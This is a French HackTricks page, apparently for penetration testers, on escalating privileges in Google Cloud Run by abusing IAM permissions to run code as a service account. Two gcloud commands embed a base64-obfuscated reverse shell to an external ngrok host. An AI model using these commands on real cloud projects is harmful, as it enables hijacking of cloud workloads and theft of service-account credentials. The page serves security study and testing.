GCP - Run Privesc

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
Obtenez le swag officiel PEASS & HackTricks
Découvrez La famille PEASS, notre collection exclusive de NFTs
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts GitHub.

Cloud Run

Pour plus d'informations sur Cloud Run, consultez :

`run.services.create`, `iam.serviceAccounts.actAs`, `run.routes.invoke`

Un attaquant avec ces autorisations peut créer un service d'exécution exécutant un code arbitraire (conteneur Docker arbitraire), attacher un compte de service à celui-ci, et faire en sorte que le code exfiltre le jeton du compte de service à partir des métadonnées.

Un script d'exploitation pour cette méthode peut être trouvé ici et l'image Docker peut être trouvée ici.

Notez que lors de l'utilisation de gcloud run deploy au lieu de simplement créer le service cela nécessite l'autorisation update. Consultez un exemple ici.

`run.services.update`, `iam.serviceAccounts.actAs`

Comme le précédent mais en mettant à jour un service :

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

`run.services.setIamPolicy`

Donnez-vous des autorisations précédentes sur Cloud Run.

`run.jobs.create`, `run.jobs.run`, (`run.jobs.get`)

Lancez un travail avec un shell inversé pour voler le compte de service indiqué dans la commande. Vous pouvez trouver un exploit ici.

`run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`)

Similaire au précédent, il est possible de mettre à jour un travail et mettre à jour le compte de service, la commande et l'exécuter:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

`run.jobs.setIamPolicy`

Donnez-vous les autorisations précédentes sur Cloud Jobs.

Références

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks:

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF Consultez les PLANS D'ABONNEMENT!
Obtenez le swag officiel PEASS & HackTricks
Découvrez La famille PEASS, notre collection exclusive de NFTs
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts github.

PrécédentGCP - Resourcemanager Privesc SuivantGCP - Secretmanager Privesc

Dernière mise à jour il y a 1 mois

Cloud Run

run.services.create, iam.serviceAccounts.actAs, run.routes.invoke

run.services.update, iam.serviceAccounts.actAs

run.services.setIamPolicy

run.jobs.create, run.jobs.run, (run.jobs.get)

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

run.jobs.setIamPolicy